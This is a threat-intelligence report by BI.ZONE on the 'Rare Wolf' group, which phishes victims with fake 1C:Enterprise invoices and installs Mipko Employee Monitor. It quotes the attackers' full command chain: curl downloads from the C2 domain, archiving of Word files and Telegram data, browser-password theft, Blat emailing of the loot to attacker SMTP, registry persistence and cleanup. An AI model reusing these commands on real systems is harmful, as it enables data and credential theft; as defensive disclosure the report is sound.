Rare Wolf preys on sensitive data using fake 1C:Enterprise invoices as a lure
BI.ZONE Threat Intelligence specialists have discovered a cybercriminal group that has been active since at least 2019. While this cluster of activity was previously directed against the countries neighboring Russia, now such attacks have reached Russia itself. The attackers use phishing emails to install a legitimate monitoring tool, Mipko Employee Monitor, on target devices and gain access to the Telegram messenger, steal sensitive documents and passwords.
- Unusual attachment formats tend to lower the victim’s guard and increase the likelihood of a compromise.
- Hacking and stealing Telegram accounts is particularly popular, besides accessing user data is as easy as copying a single folder.
- Attackers make extensive use of legitimate monitoring tools. This allows them to go undercover inside the compromised IT infrastructure.
The criminals sent phishing emails with archives that contained, as they claimed, 1C:Enterprise invoices and their digital keys. This enabled them to distract the victims from noticing the file extension. The content of the message is shown in the figure below.
The phishing email text
The archive contained an executable 1C.Предприятие Платежная накладная № 579823592352-2023.scr, which was the installer for Smart Install Maker.
Running the executable file caused the following actions:
- Creation of a folder
C:\Intel\and assigning the attributes Hidden, System, Unindexed. - Creation of keys Video Configurations and Mail Configurations in the registry hive
Software\Microsoft\Windows\CurrentVersion\Run. The key values were set as file pathsC:\Intel\go.exeandC:\Intel\mail.exethat would be unpacked later. - Creation of a file
C:\Intel\rezet.cmd, downloading encrypted archives from the C2 server using cURL anddriver.exeto unpack them:C:\Intel\curl.exe -o C:\Intel\driver.exe http://acountservices[.]nl/downs/driver.exe
C:\Intel\curl.exe -o C:\Intel\keys.rar http://acountservices[.]nl/downs/keys.rar
C:\Intel\curl.exe -o C:\Intel\MPK.rar http://acountservices[.]nl/downs/MPK.rar
C:\Intel\curl.exe -o C:\Intel\pas.rar http://acountservices[.]nl/downs/pas.rar
In addition, driver.exe served to collect and archive all Microsoft Word documents:
C:\Intel\driver.exe a -r -hplimpid2903392 C:\Intel\doc.rar C:\*.doc* /y
Telegram messenger data was also collected and packaged:
C:\Intel\driver.exe a -r -hplimpid2903392 C:\Intel\tdata.rar "C:\Users\[user]\AppData\Roaming\Telegram Desktop\tdata" /y
The attackers sent the collected data through a controlled mail service. For this purpose, they extracted the Blat utility from the pas.rar archive and used it to send emails through the command line:
C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\pas.rar blat.exe C:\Intel\ /y
Then both archives were sent to the attackers’ email account:
C:\Intel\blat.exe -to %mail-in% -f "TELEGRAM<%mail-out%>" -server smtp.acountservices[.]nl -port 587 -u %mail-out% -pw %pass-out% -subject "[redacted]" -body "[redacted]" -attach "C:\Intel\tdata.rar"
C:\Intel\blat.exe -to %mail-in% -f "DOCUMENT<%mail-out%>" -server smtp.acountservices[.]nl -port 587 -u %mail-out% -pw %pass-out% -subject "[redacted]" -body "[redacted]" -attach "C:\Intel\doc.rar"
After sending, the archives with the collected data and the cURL utility were deleted:
del /q C:\Intel\curl.exe
del /q /f C:\Intel\doc.rar
del /q /f C:\Intel\tdata.rar
Next, the go.exe file was extracted from the keys.rar archive. Execution was suspended for an hour using the ping utility after which the files mail.exe and userprofile.exe were extracted from the archives. The latter was launched to install Mipko Employee Monitor software in the compromised system:
C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\keys.rar go.exe C:\Intel\ /y
ping -n 3600 127.0.0.1
C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\pas.rar mail.exe C:\Intel\ /y
C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\keys.rar userprofile.exe C:\Intel\ /y
C:\Intel\userprofile.exe
At this point, the system was forced to reboot and the rezet.cmd file was deleted:
wmic OS WHERE Primary="TRUE" CALL Win32Shutdown 6
del /q C:\Intel\rezet.cmd
After rebooting, the files mail.exe and go.exe were executed.
Launching mail.exe led to the following actions:
- Passwords from browsers on the compromised device were collected into a
password.txtfile. To do this, the software WebBrowserPassView was extracted from the archivepas.rar:C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\pas.rar wbpv.exe C:\Intel\ /y
C:\Intel\wbpv.exe /stext "C:\Intel\password.txt" - Once the passwords were retrieved, the files that were no longer required for execution were deleted:
del /q /f С:\Intel\wbpv.exe
del /q /f C:\Intel\pas.rar
del /q /f C:\Intel\rezet.cmd
del /q /f C:\Intel\driver.exe - The registry key responsible for
mail.exeautorun was also deleted:reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Mail Configurations" /f - This was followed by checking the availability of the network resource
www.msftncsi.com/ncsi.txt. If the check was successful, the obtained user credentials would be emailed to the attacker using the Blat utility:curl www.msftncsi.com/ncsi.txt >nul
if "%errorlevel%"=="0" (
goto ok
) else (
goto no
)
:ok
C:\Intel\blat.exe -to %mail-in% -f "PASSWORD<%mail-out%>" -server [REDACTED] -port 587 -u %mail-out% -pw %pass-out% -subject "Password %COMPUTERNAME%/%USERNAME%" -body "Password %COMPUTERNAME%/%USERNAME%" -attach "C:\Intel\password.txt" - The files
go.exe,password.txt, andblat.exewere deleted at this point:del /q /f C:\Intel\go.exe
del /q /f C:\Intel\password.txt
del /q /f C:\Intel\blat.exe
Running go.exe triggered the following actions:
- Remove the Mipko Employee Monitor configuration if it is present on the system:
del /q /f %PROGRAMDATA%\MPK\S0000 - Unpack all
keys.rarfiles into theC:\Intelfolder:C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\keys.rar C:\Intel\ /y - Unpack the
MPK.rararchive containing the connection configuration into folderC:\Users\[user]\AppData\Local\:C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\MPK.rar %PROGRAMDATA% /y - Move the file from
C:\Users\[user]\AppData\Local\MPK\S0000.txttoC:\Users\[user]\AppData\Local\MPK\S0000:ren %PROGRAMDATA% \MPK\S0000.txt %PROGRAMDATA% \MPK\S0000 - Add the
Userinitkey in the registry hiveHKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Runto launch Mipko Employee Monitor at system startup:reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Userinit /t reg_sz /d "C:\Intel\userprofile.exe" /f - Launch Mipko Employee Monitor:
start C:\Intel\userprofile.exe - Delete temporary files that may be in the folder
C:\Intel\:del /q /f C:\Intel\MPK.rar
del /q /f C:\Intel\keys.rar
del /q /f C:\Intel\curl.exe
del /q /f C:\Intel\dc.exe
del /q /f C:\Intel\dc.rar
del /q /f C:\Intel\rezet.cmd
del /q /f C:\Intel\open.lnk
del /q /f C:\Intel\go.exe
del /q /f C:\Intel\go1.exe
del /q /f C:\Intel\mail.exe - Delete the registry key responsible for the autorun of
go.exe:reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Video Configurations" /f
The Mipko Employee Monitor software allows attackers to monitor user activity, intercept keystrokes and clipboard logs, record screen activity and device camera.
Cybercriminals continue to leverage dual-use software and legitimate tools to launch targeted attacks. This often allows them to blend into the compromised IT infrastructure and bypass multiple defenses. In addition, it is important to monitor the threat landscape of neighboring countries: attackers may change their targets over time, influenced by geopolitical events, among other things.
| Tactic | Technique | Procedure |
|---|---|---|
| Initial Access |
Phishing: Spearphishing Attachment |
Rare Wolf uses emails containing malicious attachments to gain initial access |
| Execution |
User Execution: Malicious File |
To initiate the compromise process, the victim needs to launch the malicious file |
|
Command and Scripting Interpreter: Windows Command Shell |
Rare Wolf uses |
|
| Persistence |
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Rare Wolf uses the registry branches responsible for autoloading to gain persistence in the system |
| Privilege Escalation |
Abuse Elevation Control Mechanism: Bypass User Account Control |
Smart Install Maker asks the user for administrator privileges for privileged execution |
| Defense Evasion |
Abuse Elevation Control Mechanism: Bypass User Account Control |
Smart Install Maker asks the user for administrator privileges for privileged execution |
|
Hide Artifacts: Hidden Files and Directories |
The folder |
|
|
Indicator Removal: File Deletion |
The file The files in |
|
|
Indicator Removal: Clear Persistence |
When executing |
|
|
Masquerading |
The executable files used by Rare Wolf in gaining initial access are disguised as Microsoft Word documents |
|
|
Modify Registry |
Rare Wolf uses registry hives responsible for autoloading to gain persistence in the system |
|
| Credential Access |
Credentials from Password Stores: Credentials from Web Browsers |
Rare Wolf downloads WebBrowserPassView (a program to retrieve user credentials from browsers) onto the compromised device |
|
Keylogging |
Mipko Employee Monitor allows attackers to access keystroke records |
|
| Discovery |
File and Directory Discovery |
|
|
Process Discovery |
Mipko Employee Monitor allows attackers to access the processes running on the system |
|
|
Log Enumeration |
Mipko Employee Monitor accesses Windows logs to collect information during execution |
|
| Collection |
Archive Collected Data |
The resulting files collected by |
|
Automated Collection |
Mipko Employee Monitor collects data on a compromised device without the intervention of the attacker |
|
|
Clipboard Data |
Mipko Employee Monitor allows attackers to access clipboard history |
|
|
Data from Local System |
|
|
|
Data Staged: Local Data Staging |
Archives with the collected files remain on the compromised system until they are sent to the C2 server |
|
|
Screen Capture |
Mipko Employee Monitor allows attackers to access screenshots taken on a compromised system |
|
|
Video Capture |
Mipko Employee Monitor allows attackers to access screenshots taken on a compromised system |
|
| Command and Control |
Application Layer Protocol: Mail Protocols |
|
|
Application Layer Protocol: Web Protocols |
Rare Wolf uses HTTP to download tools |
|
|
Ingress Tool Transfer |
All additional software is downloaded from the C2 as archives |
|
|
Remote Access Software |
Rare Wolf uses Mipko Employee Monitor to gain access to a compromised system |
acountservices[.]nl53043bd27f47dbbe3e5ac691d8a586ab56a33f734356be9b8e49c7e975241a56e6ea6ce923f2eee0cd56a0874e4a0ca467711b889553259a995df686bd35de86e1e9b7182717f6851e7deb0aadf8f31c67bf43e2d8ef5b052e697f467ec2e3f34999f77a5a52d79dbb4b14dd7035aed21aecf85631ea20b91d7adf97f7b729e8a49092711a56efc520416e53bbc9891092d1d970e154b923b7603083bbd7d870a9eeffdad26eabe90fc32a79700af671daefd43eb7ecfb8f20ce4e667cbd8dcb
A full list of the indicators of compromise is available to the users of BI.ZONE Threat Intelligence.
Phishing emails are a popular attack vector against organizations. To protect your mail server, you can use specialized services that help to filter unwanted emails. One such service is BI.ZONE CESP. The solution eliminates the problem of illegitimate emails by inspecting every message. It uses over 600 filtering mechanisms based on machine learning, statistical, signature, and heuristic analysis. This inspection does not slow down the delivery of secure messages.
Legitimate tools are applied more and more often today to attack companies. Preventive defenses do not detect such methods—the intruders penetrate the infrastructure unnoticed. To discover such attacks, we recommend that companies implement detection, response, and prevention solutions, such as BI.ZONE TDR, as part of their security operations center.